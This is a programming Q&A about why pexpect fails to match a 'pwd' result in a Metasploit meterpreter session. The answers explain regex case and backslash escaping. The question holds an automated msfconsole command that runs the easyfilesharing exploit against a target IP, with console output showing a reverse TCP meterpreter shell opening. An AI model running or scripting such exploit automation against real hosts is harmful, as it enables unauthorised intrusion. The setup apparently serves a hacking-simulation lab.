
I am trying to execute a pwd command in my metasploit session, then, using pexpect, check that the correct result was returned.

Here is my function:

import sys
import time

import pexpect


def executeEasyFileSharing(target):
    # target[1] is the RHOSTS value; -x runs the quoted msfconsole commands on start-up
    msf_cmds = "use exploit/windows/http/easyfilesharing_post ;set rhosts " + target[1] + ";run"
    print("Executing: msfconsole -q -x '" + msf_cmds + "'")
    print("About to metasploit")

    child = pexpect.spawn('msfconsole -q -x "' + msf_cmds + '"', encoding='utf-8')
    # Echo everything pexpect reads and writes to the terminal
    child.logfile = sys.stdout

    # expect_exact() returns the index of the pattern that matched (0 for a single pattern)
    print(child.expect_exact("Meterpreter session 1 opened", timeout=300))
    time.sleep(10)
    child.sendline("pwd")
    child.expect("C:\WINDOWS\System32",timeout=50)
    print("Success")

executeEasyFileSharing(["buffer","192.168.1.86"])

Here is the console output seen when run:

$ python3 execution.py
Executing: msfconsole -q -x 'use exploit/windows/http/easyfilesharing_post ;set rhosts 192.168.1.86;run'
About to metasploit
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
rhosts => 192.168.1.86
[*] Started reverse TCP handler on 192.168.1.102:4444 
[*] Sending stage (175174 bytes) to 192.168.1.86
[*] Meterpreter session 1 opened (192.168.1.102:4444 -> 192.168.1.86:59854 ) at 2022-03-05 13:41:46 +0000
0
pwd

meterpreter > pwd
C:\WINDOWS\system32
meterpreter > Traceback (most recent call last):
  File "/home/barry/Desktop/HackSimScripts/HackingSim/execution.py", line 50, in <module>
    executeEasyFileSharing(["buffer","192.168.1.86"])
  File "/home/barry/Desktop/HackSimScripts/HackingSim/execution.py", line 47, in executeEasyFileSharing
    child.expect("C:\WINDOWS\System32",timeout=50)
  File "/usr/lib/python3/dist-packages/pexpect/spawnbase.py", line 343, in expect
    return self.expect_list(compiled_pattern_list,
  File "/usr/lib/python3/dist-packages/pexpect/spawnbase.py", line 372, in expect_list
    return exp.expect_loop(timeout)
  File "/usr/lib/python3/dist-packages/pexpect/expect.py", line 181, in expect_loop
    return self.timeout(e)

The expected output should be that the function executes and Success is printed. pwd's result is clearly shown, so why isn't pexpect detecting it?

Dee Sharp
  • You expect `System32` with an upper-case `S` but it sends `system32` with a lower-case `s`, and this is a big difference. – furas Mar 05 '22 at 19:44

1 Answer


You expect System32 with an upper-case S but it sends system32 with a lower-case s, and this is the problem.

This should work:

# expect() compiles its argument as a regex, so the backslashes are doubled;
# otherwise \W and \s are read as character classes, not path separators
child.expect(r"C:\\WINDOWS\\system32", timeout=50)

Alternatively, you can use (?i) to make the check case-insensitive:

# (?i) must be the first thing in the pattern
child.expect(r"(?i)C:\\WINDOWS\\System32", timeout=50)

Related question on Stack Overflow: What does (?i) mean in a Python/pexpect regex?

furas
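The following is an added example, not code from the question or the answer. It mirrors with the standard library what pexpect does internally, so it runs without Metasploit or pexpect installed: `expect()` compiles a str pattern with `re.compile(pattern, re.DOTALL)` and searches the buffer, `expect_exact()` does a plain substring search. `METERPRETER_OUTPUT` is a constructed stand-in for the text meterpreter printed above (echoed `pwd`, the lower-case `system32` path, next prompt). It goes one step beyond the case point of the answer: because `expect()` takes a regex, the unescaped `\W` and `\S`/`\s` in `"C:\WINDOWS\System32"` are parsed as character classes rather than path separators, so the path has to be escaped (or matched with `expect_exact()`) before fixing the case alone will match.

```python
import re

# Constructed stand-in for the text pexpect would have buffered after sendline("pwd"):
# the echoed command, the real output (lower-case "system32"), and the next prompt.
METERPRETER_OUTPUT = "pwd\r\nC:\\WINDOWS\\system32\r\nmeterpreter > "


def expect_regex(pattern: str, buffer: str) -> bool:
    """Mirror pexpect.expect(): a str pattern is compiled with re.DOTALL and searched."""
    return re.compile(pattern, re.DOTALL).search(buffer) is not None


def expect_exact(literal: str, buffer: str) -> bool:
    """Mirror pexpect.expect_exact(): plain substring search, no regex parsing."""
    return literal in buffer


def path_pattern(path: str, ignore_case: bool = False) -> str:
    """Build a regex that matches a Windows path literally.

    re.escape() doubles the backslashes, so "\\W" and "\\s" stay path separators
    instead of becoming the regex classes for non-word / whitespace characters.
    The (?i) flag has to lead the pattern (Python 3.11+ rejects it anywhere else).
    """
    return ("(?i)" if ignore_case else "") + re.escape(path)


def compare_patterns(buffer: str = METERPRETER_OUTPUT) -> dict:
    """Run the patterns from the question and the answer, plus corrected ones."""
    return {
        # question as posted: wrong case AND unescaped backslashes -> times out
        "question_regex": expect_regex("C:\\WINDOWS\\System32", buffer),
        # answer with only the case fixed: \W matches the first "\", but \s
        # wants whitespace where the second "\" sits -> still times out
        "answer_regex": expect_regex("C:\\WINDOWS\\system32", buffer),
        # case fixed and path escaped for the regex engine -> matches
        "escaped_regex": expect_regex(path_pattern("C:\\WINDOWS\\system32"), buffer),
        # escaped and case-insensitive, so System32 vs system32 no longer matters
        "ci_escaped_regex": expect_regex(
            path_pattern("C:\\WINDOWS\\System32", ignore_case=True), buffer),
        # expect_exact() sidesteps the regex problem but is still case-sensitive
        "exact_lower": expect_exact("C:\\WINDOWS\\system32", buffer),
        "exact_upper": expect_exact("C:\\WINDOWS\\System32", buffer),
    }


if __name__ == "__main__":
    for name, matched in compare_patterns().items():
        print(f"{name:18} -> {'match' if matched else 'timeout'}")
```

For a literal path the simplest robust choice in the original script is `child.expect_exact("C:\\WINDOWS\\system32")`; if the drive letter or directory case may vary between targets, `child.expect(path_pattern(path, ignore_case=True))` keeps the regex route without hand-escaping.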